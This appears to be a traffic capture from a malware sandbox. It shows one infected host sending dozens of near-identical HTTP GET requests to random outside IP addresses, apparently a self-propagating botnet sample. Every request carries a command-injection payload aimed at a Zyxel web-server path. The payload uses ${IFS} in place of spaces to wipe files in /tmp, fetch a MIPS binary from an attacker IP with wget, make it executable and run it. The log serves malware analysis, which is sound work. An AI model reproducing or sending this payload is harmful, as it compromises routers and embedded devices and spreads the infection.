                                        Jan 14, 2024 16:18:00.942773104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        148192.168.2.1357632147.184.231.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942845106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        149192.168.2.135641060.120.23.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942897081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        150192.168.2.1357892179.65.177.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942897081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        151192.168.2.1349374121.30.22.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942919016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        152192.168.2.134303267.93.93.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942970991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        153192.168.2.1360340129.60.9.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943027020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        154192.168.2.1357584153.144.74.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943053961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        155192.168.2.1345306155.196.127.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943119049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        156192.168.2.1345462212.12.14.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943147898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        157192.168.2.135021249.125.28.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943190098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        158192.168.2.1332890208.70.95.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943213940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        159192.168.2.133499478.252.118.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943247080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        160192.168.2.136002262.86.237.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943286896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        161192.168.2.1334620221.44.52.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943331003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        162192.168.2.1351130131.43.239.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943396091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        163192.168.2.1336756139.46.19.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943458080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        164192.168.2.1338342210.111.19.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943459034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        165192.168.2.1338680108.16.113.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943520069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        166192.168.2.1343856160.152.72.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943569899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        167192.168.2.1344182111.118.200.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943578005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        168192.168.2.134205853.198.234.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943614006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        169192.168.2.135930641.171.205.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943634033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        170192.168.2.1356666205.51.125.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943707943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        171192.168.2.133795699.189.134.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943736076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        172192.168.2.13428921.164.236.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943767071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        173192.168.2.13491289.203.97.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943808079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        174192.168.2.13570801.215.222.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943866968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        175192.168.2.13465701.214.183.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943881035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        176192.168.2.1336734221.204.239.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943906069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        177192.168.2.1339920207.31.24.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.943974972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        178192.168.2.134538054.99.95.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944015026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        179192.168.2.1357132122.190.200.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944067955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        180192.168.2.1348152142.230.8.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944087029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        181192.168.2.1345144193.222.32.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944148064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        182192.168.2.1343106105.137.23.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944164038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        183192.168.2.1346594139.175.192.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944220066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        184192.168.2.1341854112.53.115.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944255114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        185192.168.2.1342898144.178.174.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944304943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        186192.168.2.134688025.164.223.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944328070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        187192.168.2.1344578159.52.88.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944375992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        188192.168.2.1333392190.146.139.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944395065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        189192.168.2.1346392206.207.22.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944439888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        190192.168.2.1358630164.91.121.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944514036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        191192.168.2.1339154145.101.135.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944547892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        192192.168.2.1351110186.53.97.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944595098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        193192.168.2.1342518142.252.149.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944634914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        194192.168.2.1351226137.4.151.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944703102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        195192.168.2.1348714159.28.197.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944722891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        196192.168.2.1360780122.55.198.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944752932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        197192.168.2.13524401.67.130.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944793940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        198192.168.2.1359132118.13.139.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944839001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        199192.168.2.134810017.150.149.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944864988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        200192.168.2.1344300162.36.11.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944886923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        201192.168.2.1343132101.231.125.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944937944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        202192.168.2.135663827.218.208.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.944973946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        203192.168.2.133361424.141.255.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945035934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        204192.168.2.134515265.163.202.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945086002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        205192.168.2.134904218.98.58.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945120096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        206192.168.2.134572225.98.107.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945128918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        207192.168.2.1339688120.22.159.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945197105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        208192.168.2.1339948164.182.243.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945240021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        209192.168.2.135961423.107.193.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.945281029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        210192.168.2.1338474161.41.50.78443
                                        TimestampBytes transferredDirectionData
